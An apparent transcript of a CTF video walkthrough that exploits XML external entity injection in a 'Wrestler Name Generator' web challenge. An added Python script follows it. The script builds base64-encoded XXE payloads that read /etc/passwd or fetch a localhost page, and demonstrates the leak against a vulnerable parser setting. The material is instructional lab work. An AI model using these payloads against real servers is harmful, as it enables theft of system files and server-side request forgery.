What's going on everybody, my name is John Hammond and welcome back to another YouTube video. We're talking about the Sunshine CTF. The challenge we're going to take a look at now is the Wrestler Name Generator; it's the second challenge in the web category. It says: "Even better than the Wu-Tang name generator. Legend has it that Hulk Hogan used this app to get his name." So we have ng.sunshinectf.org. Let's go check it out.

Looks like: "Welcome to the Wrestler Name Generator. Enter your name below to get your wrestler name." So you have first name, last name, weapon of choice. Okay, that's funny. So let's just say my first name is John and my last name is Hammond. Cool, and let's get wrestler name. Weapon of choice is obviously thumbtacks. My wrestler name is John "The Hacker" Hammond. Oh, it warms my heart, warms my heart. Thank you, Sunshine CTF, how'd you know?

So the interesting thing here to take a look at is this input over in the URL. This looks like a lot of base64. What I'm going to do is actually fire this up in IDLE so we can work with it interactively. Let's paste this in, and actually we want to be able to decode it, so let's set it to a variable. Let's just say a, whatever. Let's do import urllib, and let's urllib.unquote, I think, right? a. Yep, okay, cool. So that gives us our base64. Let's go ahead and decode that as base64. You can do this in Python 2; Python 3 will yell at you, you've got to import codecs and do all that crap, so Python 2 is much faster in my case for CTFs, but I know it's going to run out of support pretty soon. Single tear, small violin.

So we got XML responded to us: XML version 1.0, with our input included, and the first name and last name. Okay, so it looks like we can control XML. It looks like we actually have the potential to send in some XML by changing this, right? Like, if we were to just supply our own base64 in that URL, would it decode it, would it work with it on its own for us? We can find that out. Let's actually go ahead and define a, how about, XML string. We can go ahead and make a function that will actually take an XML string, base64-encode it, and then prepare it with the urllib quote function. So let's just call that something stupid like work or whatever. Yeah, yeah, work. Hello, thank you. Okay, so string, doesn't matter; again, we're just doing this in IDLE so it's kind of faster for us. Let's just say return string.encode("base64"), and then let's actually say we want that URL-quoted, so urllib.quote. Good, okay. So now we can work on something like this, blah blah blah, and let's just actually change my name to be "please subscribe". Okay, so now it gives us all that. Can we copy and paste that in? Will that work as a fine payload? Just replace that input, and yes: Please "The Slasher" Subscribe. That's cool.

All right, so what do we have here? We have control over XML, the Extensible Markup Language. I have talked about this in another video with PwnFunction, who's on YouTube, is in the Discord server, phenomenal guy. If you want to go check that video out, we talk about XML external entities, and that is the XXE vulnerability that we can take advantage of in this case. So we go into much more depth in PwnFunction's video. He's awesome, he's growing a YouTube channel, so go subscribe to him if you haven't. But we talk about it a little bit more in depth there and we showcase how you can take advantage of this by exploring the XML. What I want to do is show you the payload and then how we can take advantage of it.

So let's get to PayloadsAllTheThings, which is a phenomenal resource if you're doing some capture-the-flag stuff. It has a nice GitHub repository, it's a good list. Scroll down here, we should have XXE injection, or XML external entities. "An XML external entity attack is a type of attack against an application that parses XML input and allows XML entities. An XML entity can be used to tell the XML parser to fetch specific content on the server." Okay. "If an entity is declared within a DTD it's an internal entity, and external entities outside are identified by SYSTEM." So we've got some syntax here we can use. We can go ahead and determine, okay, let's get /etc/passwd displayed to us. Looks like this is just XML that we can just go ahead and put together, so why not try it? Let's copy and paste this, let's say work on that, and we're going to have to just kind of escape these, unfortunately. So what will that return for us? Let's try it.

Let's move over to our Wrestler Name Generator and, following the input, let's make it this. "My wrestler name is The Fierce", and we didn't have any luck. I viewed the source here just to say, though, it says: "Hacker name functionality coming soon. If you're trying to test the hacker name functionality, make sure you're accessing the page from the web server. Your hacker name is REDACTED. If you're trying to test the hacker name functionality, make sure you're accessing the page from the web server." Okay, that's interesting. Looks like we have to be accessing it locally, or some way, to get the hacker name; it's REDACTED. But we got "The Fierce", so it looks like it didn't return our original file, the /etc/passwd payload. Now why is that, right? DOCTYPE root. In the original one we were using encoding UTF-8 and we had input displayed here, so maybe we need to put that in: input, first name, last name, stuff. Let's try that. Let's say DOCTYPE root, test SYSTEM, root, root. Let's put it... let's make that DOCTYPE input. Oh, that's already defined, isn't it, previously, right, in the XML. So maybe we can just say firstname includes root, and that's going to be capital here, and firstname. Let's try that, and let's get our last name in there too just for safekeeping, and make sure we end input. Maybe does input still have to be in there? Let's find out. We've defined the root here, so before we create our firstname, let's have input in there. I'm sorry, you probably might not have been able to see much of that. Let me try and resize that so that my face isn't in the way, my bad. Let's run work on that and see if we got a result that we can work with here. Paste that in. Nope, we have "The Slasher" Subscribe.

Okay, so let's go back to our payload and see if we can make anything. We didn't have the encoding UTF-8 in there, so let's, I guess, include that just for some niceties, maybe in case it needs that, just in case. And then DOCTYPE root, ENTITY SYSTEM file:///etc/passwd, input, firstname. We don't need the root document in there anymore, do we? We just need test, firstname, lastname, subscribe. Let's try that. How does this guy look? So I removed the root, and I didn't even close it when I had it before, earlier, did I? Oh no, did I close it earlier? I guess I probably just did that and then wasn't thinking. So let's paste that in and see. We got... okay, cool, we got /etc/passwd. So now we know we have local file inclusion and we've got the XML external entity attack working.

So reviewing that source, though, that comment said that if you need to test the hacker name functionality, make sure you're accessing the page from the web server. So just as we saw earlier, we have to supply that. Maybe we can just access this page from localhost by changing up what we want to actually access in our XML entity. Let's change this: no longer XML version blah blah blah, not file:///etc/passwd, that's what we were looking for before. Let's change it to HTTP and let's go to localhost, right, because that's going to access itself, and we'll say, what is it that we want? We want the generate.php page. Yeah, okay, generate.php. Enter that. Now we've got the payload we can pass in, and I'm sorry we've been doing this by hand; it's probably much smarter to script this, but we'll crank that out in another video or some extracurricular for you. So there we go: "Your wrestler name is sun I love Hulk The External Entity Hogan Subscribe." So there is our flag. We can go ahead and submit that, and that is that: 150 points for Wrestler Name Generator, some XML external entity attacks, and that's crazy cool.

Something that I had failed with when I was first going through this challenge was actually going to the generate.php page on its own, or actually, sorry, just the home page, and entering some XML stuff within these input fields, and I don't think it worked as well as it should have, which is why, when I realized, like, oh, I can just control that GET variable, why don't I do that, I had a lot more success. So, still piecing together what that attack really looks like. I'm not the best with XML, so I probably failed on that root entity over and over again. I'm sorry for that, but hey, cool attack, glad we got it working, and I hope it was very, very interesting and very, very fun for you guys. If you did like this video, please do like, comment and subscribe. Love to see you in the Discord server; there is a link in the description. Love to see you on PayPal, love to see you on Patreon, just love to see you. Thanks for watching guys, see you in the next video.
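Added example, not part of the video or the challenge's own code: the video builds the base64-plus-URL-encoded payload by hand in IDLE and promises a scripted version. The block below scripts that helper in Python 3, builds the XXE payload shape that finally worked (external entity declared in the DOCTYPE, referenced from inside the firstname element), and then reproduces the effect locally with Python's own xml.sax parser, with external entity resolution switched on (the vulnerable configuration) beside its default-off setting. Assumptions: the query parameter is named input, a constructed temporary file stands in for /etc/passwd, and the local parser is Python's expat-based xml.sax rather than the PHP parser behind the real challenge, so this shows the mechanism, not the challenge server itself.

```python
"""Scripted XXE payload helper plus a local vulnerable-vs-default parse demo.
Added example; the parser here is Python's xml.sax, not the challenge's PHP."""
import base64
import io
import os
import pathlib
import tempfile
import urllib.parse
import xml.sax
import xml.sax.handler


def encode_input(xml_text: str) -> str:
    """XML -> base64 -> URL-quoted value for the (assumed) ?input= parameter,
    the same transform the video's work() helper does interactively."""
    b64 = base64.b64encode(xml_text.encode("utf-8")).decode("ascii")
    return urllib.parse.quote(b64, safe="")


def decode_input(param: str) -> str:
    """What the server sees: URL-unquote, then base64-decode."""
    return base64.b64decode(urllib.parse.unquote(param)).decode("utf-8")


def xxe_payload(system_id: str, lastname: str = "subscribe") -> str:
    """Payload shape from the video: the external entity is declared in the
    DOCTYPE and referenced inside <firstname>, so whatever the parser fetches
    (a file, or http://localhost/... for the SSRF variant) is reflected back."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE input [<!ENTITY test SYSTEM "{system_id}">]>\n'
        f"<input><firstname>&test;</firstname><lastname>{lastname}</lastname></input>"
    )


class _FieldCollector(xml.sax.handler.ContentHandler):
    """Collect each element's text, the way a naive name generator would."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None

    def startElement(self, name, attrs):
        self._current = name
        self.fields.setdefault(name, "")

    def characters(self, content):
        if self._current is not None:
            self.fields[self._current] += content

    def endElement(self, name):
        self._current = None


def parse_fields(xml_text: str, resolve_external_entities: bool) -> dict:
    """Parse submitted XML. True reproduces the vulnerable server behaviour
    (fetch SYSTEM entities); False is xml.sax's default since Python 3.7.1."""
    parser = xml.sax.make_parser()
    parser.setFeature(xml.sax.handler.feature_external_ges, resolve_external_entities)
    handler = _FieldCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return handler.fields


def demo() -> dict:
    """A constructed temp file plays /etc/passwd; returns what each parser reflects."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as tmp:
        tmp.write("root:x:0:0:root:/root:/bin/bash\n")  # constructed sample line
        secret_path = tmp.name
    try:
        payload = xxe_payload(pathlib.Path(secret_path).as_uri())
        param = encode_input(payload)          # value that would go in ?input=
        served = decode_input(param)           # what the server decodes and parses
        leaked = parse_fields(served, resolve_external_entities=True)["firstname"]
        safe = parse_fields(served, resolve_external_entities=False)["firstname"]
    finally:
        os.unlink(secret_path)
    return {"param": param, "vulnerable_firstname": leaked, "hardened_firstname": safe}


if __name__ == "__main__":
    result = demo()
    print("vulnerable parser reflected:", result["vulnerable_firstname"].strip())
    print("default parser reflected:   ", repr(result["hardened_firstname"]))
```

To aim the same payload at the challenge's localhost trick, pass "http://localhost/generate.php" as system_id instead of a file URI; the encoding and reflection path are identical, which is exactly why the file read and the SSRF-style fetch were two swaps of one string in the video.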